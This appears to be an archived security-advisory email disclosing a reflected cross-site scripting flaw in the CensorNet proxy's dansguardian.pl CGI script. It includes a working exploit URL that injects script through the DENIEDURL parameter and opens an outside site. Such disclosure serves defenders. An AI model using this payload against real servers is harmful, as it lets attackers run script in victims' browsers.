A cross site scripting vulnerability exists in the CensorNet Proxy Service
(www.censornet.com) that allows scripting (and html) to be passed to the
cgi script and displayed in the web browser.
- -------------------------------------------------------------------
This email has been sent from the Royal Borough of Windsor and Maidenhead LEA system, if you have cause for complaint regarding the
content of this email please contact abuse (at) rbwm (dot) org [email concealed]
- -------------------------------------------------------------------
A cross site scripting vulnerability exists in the CensorNet Proxy Service
(www.censornet.com) that allows scripting (and html) to be passed to the
cgi script and displayed in the web browser.
Exploit:
http://SERVER/cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Count
er-Strike__servers__from__£10_per_month!');window.open("http://www.socke
tx.co.uk")</script>
Regards,
Richard Maudsley
- -------------------------------------------------------------------
This email has been sent from the Royal Borough of Windsor and Maidenhead LEA system, if you have cause for complaint regarding the
content of this email please contact abuse (at) rbwm (dot) org [email concealed]
- -------------------------------------------------------------------
[ reply ]